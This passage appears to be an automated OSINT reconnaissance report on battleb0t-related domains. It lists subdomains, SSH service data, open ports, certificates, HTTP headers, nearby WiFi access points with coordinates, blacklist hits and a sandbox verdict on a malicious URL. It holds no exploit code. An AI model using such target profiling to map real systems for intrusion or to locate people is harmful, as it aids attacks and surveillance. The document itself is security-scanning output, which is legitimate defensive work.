"resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2095 | 104.21.6.166 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Cross-platform software | battleb0t.github.io |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom92EE90 (Net ID: 00:0C:F6:92:EE:90) | 50.8897, 6.0563 |
| 2023-05-12 03:16:31 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'HE', u'country_tld': u'.de', u'ip': u'207.154.228.169', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 82927922, u'country_code': u'DE', u'timezone': u'Europe/Berlin', u'city': u'Frankfurt am Main', u'network': u'207.154.224.0/20', u'languages': u'de', u'version': u'IPv4', u'latitude': 50.113381, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Germany', u'country_capital': u'Berlin', u'org': u'DIGITALOCEAN-ASN', u'postal': u'60311', u'asn': u'AS14061', u'country': u'DE', u'region': u'Hesse', u'longitude': 8.671931, u'country_calling_code': u'+49', u'country_area': 357021.0, u'country_code_iso3': u'DEU'} | 207.154.228.169 |
| 2023-05-12 03:09:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.133:443 | 185.199.108.0/24 |
| 2023-05-12 03:42:54 | Affiliate - Domain Whois | No | Whois | 0 | 0 | 6 | 0 | None | % Restricted rights.
%
% Terms and Conditions of Use
%
% The above data may only be used within the scope of technical or
% administrative necessities of Internet operation or to remedy legal
% problems.
% The use for other purposes, in particular for advertising, is not permitted.
%
% The DENIC whois service on port 43 doesn't disclose any information concerning
% the domain holder, general request and abuse contact.
% This information can be obtained through use of our web-based whois service
% available at the DENIC website:
% http://www.denic.de/en/domains/whois-service/web-whois.html
%
%
Domain: tjdev.de
Nserver: ns1.kramer-dns.de
Nserver: ns2.kramer-dns.de
Nserver: ns3.kramer-dns.de
Status: connect
Changed: 2023-02-25T19:39:25+01:00
| tjdev.de |
| 2023-05-12 02:45:57 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 172.67.135.9 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00indahouse.github.io]
https://www.openphish.com/feed.txt | 00indahouse.github.io |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:8443 | 188.114.96.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MainSurf (Net ID: 00:02:2D:67:EF:5F) | 50.1188, 8.6843 |
| 2023-05-12 03:03:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007-liang.github.io |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eminent926 (Net ID: 00:14:5C:86:C4:D6) | 50.8897, 6.0563 |
| 2023-05-12 02:44:32 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:04:02:53:52:8b:ff:fb:8a:0a:11:44:e7:ab:f5:69:c5:9e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:33:43 2023 GMT
Not After : Apr 14 17:33:42 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:56:66:b3:c8:a2:23:b1:5a:3f:a8:f8:12:86:96:
e9:2c:15:d7:f2:10:34:11:7a:db:91:0d:f0:b3:57:
f5:24:8b:d6:33:b2:e0:da:47:1e:c3:4b:59:19:6f:
0a:27:ae:26:29:f9:b7:07:60:5c:49:2f:47:35:2a:
5c:c8:f0:96:d7
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3C:85:65:2A:BA:2A:04:2A:54:22:30:3E:E5:23:B1:1E:15:C3:96:05
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 14 18:33:43.335 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:F2:1C:95:AC:AF:08:7C:44:9A:42:32:
2C:2F:8A:04:A1:13:F3:46:FA:9D:26:CA:C9:98:C2:1D:
74:69:E4:86:1B:02:21:00:B6:39:78:67:7F:13:7F:74:
50:2A:AE:F8:F3:CD:06:25:FB:E7:4F:A7:FE:B7:C5:D8:
77:35:DE:26:00:5A:58:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 14 18:33:43.326 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:98:54:50:30:B1:AC:EB:16:2E:CF:2C:
E2:5C:6F:49:73:2D:91:13:E2:7A:C0:23:16:9D:9E:E9:
34:9D:A8:4E:A2:02:21:00:E3:DA:6F:CF:C9:A3:6F:47:
24:1E:42:4E:CB:2C:6D:AC:F1:F2:5C:4B:15:0B:90:2E:
FE:19:52:BD:26:73:E2:1D
Signature Algorithm: sha256WithRSAEncryption
2f:9e:31:fd:c7:7d:47:cd:fd:01:35:76:75:af:bd:65:15:84:
23:f2:b5:a5:8c:aa:3b:d4:46:ab:0f:e0:6d:fb:3d:ad:16:bd:
71:fe:51:be:c7:6a:78:ea:91:90:3b:63:30:ca:95:ff:ee:9d:
47:eb:f2:5f:85:42:d9:44:d3:72:73:10:be:c7:a2:44:25:dc:
30:6d:25:07:16:5b:55:37:2d:53:15:d4:54:6f:02:56:82:ca:
95:f2:b0:da:05:fe:09:30:21:c9:bf:23:af:eb:66:9c:3c:46:
c8:ed:d9:23:0c:31:c4:20:44:6b:a8:53:fc:12:a1:6a:08:26:
66:47:c9:ad:7e:d3:29:01:28:72:f6:e7:00:31:5c:a0:b4:5c:
64:09:26:8a:da:16:e9:1a:8b:b1:d1:3c:b2:df:e5:77:f4:c3:
a8:4f:d0:1f:26:99:a7:10:8e:7f:65:a5:5e:cc:0b:70:42:ad:
cf:7c:e0:c3:b5:7f:91:07:d9:1f:ba:ef:57:c4:d1:91:9e:a3:
40:93:8d:12:a1:08:bc:b5:cb:35:70:ad:45:f9:4b:fb:c8:74:
0b:37:9e:08:b9:59:0e:0e:55:98:c2:7b:c5:55:28:93:52:3c:
ca:41:c2:5e:52:c3:32:1b:c4:d5:a9:18:45:1e:58:3a:fc:ed:
c0:69:88:aa
| battleb0t.xyz |
| 2023-05-12 02:57:22 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | vscode.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.44): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | oldfluid.battleb0t.xyz |
| 2023-05-12 02:46:54 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:86:d1:c6:73:d4:68:16:b7:b8:27:02:2e:0a:
3b:ac:b2:c0:cf:5d:bb:e0:97:62:4b:2d:4c:a7:8a:
0f:bb:28:62:25:f7:8b:c2:a2:9f:9f:a4:09:ae:64:
46:ad:01:04:9a:1c:e2:d3:da:ff:2f:0b:66:3e:17:
93:38:08:7c:21:35:76:62:9b:3d:79:67:17:13:fe:
36:e3:cb:d3:f1:13:27:de:39:d4:be:26:b9:a7:bc:
48:6c:32:02:59:5e:42:77:18:cd:f0:52:6e:ff:59:
03:7e:1d:11:be:bc:ab:d2:7f:d2:95:33:32:9e:74:
fe:3f:8c:4e:e3:30:bd:bb:06:89:38:c8:e8:4f:53:
3b:f6:63:c0:62:08:06:0e:e7:94:7f:f0:60:db:70:
ea:7f:78:d5:b9:6c:e0:49:a6:b4:37:75:b0:52:59:
b3:35:96:ab:99:46:f4:69:22:fd:0c:96:69:7a:42:
ab:47:42:08:6b:5e:8a:9a:4d:97:23:10:94:f7:79:
b4:c3:5e:97:52:71:2a:e0:cb:16:4d:05:9d:0a:4b:
32:05:28:18:33:7b:d6:34:6c:b7:3e:5b:ab:cb:54:
41:54:0f:0b:fa:c3:ea:b8:4b:80:0a:8e:f0:90:cd:
32:45:6e:24:6b:2b:da:60:08:2e:69:e6:59:89:a4:
25:87:82:03:c6:3c:bd:7c:46:55:91:56:df:8c:10:
3f:c4:bc:32:26:aa:2e:b1:d8:86:87:bf:32:be:e7:
49:d8:74:e0:99:42:34:64:c2:23:25:06:06:47:62:
f1:32:ce:42:2e:0b:a1:5c:5c:7d:55:6f:f5:43:b6:
4a:13:84:0e:20:9b:ad:e4:75:cf:98:ec:28:ca:d5:
97:e8:15:83:85:e3:c5:d8:e3:28:87:31:07:5e:2c:
11:d9:8a:d6:52:d3:ed:87:7d:ab:aa:dd:63:d0:48:
bb:c8:d0:2e:7e:92:84:13:37:53:61:b8:ec:ac:9a:
86:7b:ce:3f:d2:40:f0:db:6c:2c:1e:97:3b:c5:cb:
35:b4:86:6e:2c:94:d1:aa:dc:d2:87:31:ab:38:c5:
f4:27:1d:0a:25:44:99:80:36:03:ce:91:80:1c:d1:
59:d4:7c:5a:37:1b:0a:ce:f5:f1:c0:65:43:fc:ee:
ed:8e:bc:b1:d6:9d:85:ca:8e:38:b3:e3:c0:7f:97:
a5:98:eb:15:ff:cd:24:e7:6d:15:4d:57:89:17:a7:
5f:b4:d5:d3:b7:8f:07:9c:a8:ea:76:1e:e7:f3:2c:
9b:59:ae:2b:2b:2c:ad:9d:e2:f1:8d:94:c2:23:8f:
a7:4d:67:84:e7:2f:fb:e0:0a:d2:eb:7c:d9:ee:92:
a6:63:7b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3a:9c:49:d5:78:f8:ac:5a:ba:61:60:6a:4f:18:04:e8:71:47:
69:62:76:f2:cc:e1:7a:77:c4:76:2d:14:ad:8a:51:f0:c8:e8:
f9:38:53:48:90:b9:69:2e:c4:f1:18:37:86:86:25:90:2d:e5:
dd:87:c3:e4:30:76:38:c5:2d:b9:29:35:8f:95:4f:0a:47:25:
94:fe:7d:19:c2:82:cf:f4:d6:6f:2b:05:f9:ef:21:99:a0:d9:
36:83:ad:ba:2a:71:8c:ce:04:55:e9:a3:ae:0f:98:dd:33:3e:
45:9e:26:1e:62:2f:e5:b0:c1:a2:6e:6b:64:03:05:91:c5:ca:
50:6d:e8:c1:41:d8:07:0e:25:58:e8:76:72:9e:b3:02:79:6d:
1c:be:17:b1:a7:32:cd:3e:e0:3c:2c:87:d6:3f:c4:48:c0:a3:
08:59:a0:4e:0f:07:7f:61:15:d7:87:60:df:16:46:c9:31:1c:
35:61:49:d1:30:f6:df:8b:a1:f3:b4:55:7d:23:f2:7e:02:d1:
77:34:24:b1:27:08:2c:2f:5f:8e:75:03:e6:17:9c:33:bc:f3:
b6:45:1b:5b:14:7b:ab:6c:5f:cc:d8:bb:78:b2:59:03:74:72:
01:65:2e:6e:c2:e6:b0:7e:32:e9:3b:23:f0:2f:a8:b0:4a:66:
8f:c0:d5:69
|
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0047ol.github.io | 185.199.111.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TSMD 2.4 (Net ID: 00:02:6F:FD:8B:6E) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GP (Net ID: 00:01:24:F1:7F:54) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Galatasaray (Net ID: 00:02:CF:E2:4D:A2) | 40.2024, 29.0398 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Heylink (Category: misc)
https://heylink.me/ayhu/ | ayhu |
| 2023-05-12 03:32:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.6:8443 | 188.114.97.0/24 |
| 2023-05-12 02:45:36 | Affiliate - Internet Name | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | frabjous-lebkuchen-324004.netlify.app | funny.battleb0t.xyz |
| 2023-05-12 02:54:19 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | fluid.battleb0t.xyz |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.235): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:2E:39:B8) | 34.0544, -118.244 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.252): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.131): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.76): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:34:4B:10) | 50.8897, 6.0563 |
| 2023-05-12 02:54:12 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 33, u'threat_score': 50, u'compromised_hosts': [u'185.199.108.153'], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://yeulpay.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5812:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:120:WilError_01"\n "Local\\SM0:5576:304:WilStaging_02"\n "Local\\SM0:5576:120:WilError_01"\n "SM0:5576:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:5812:120:WilError_01"\n "Local\\SM0:5812:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:5812:304:WilStaging_02"\n 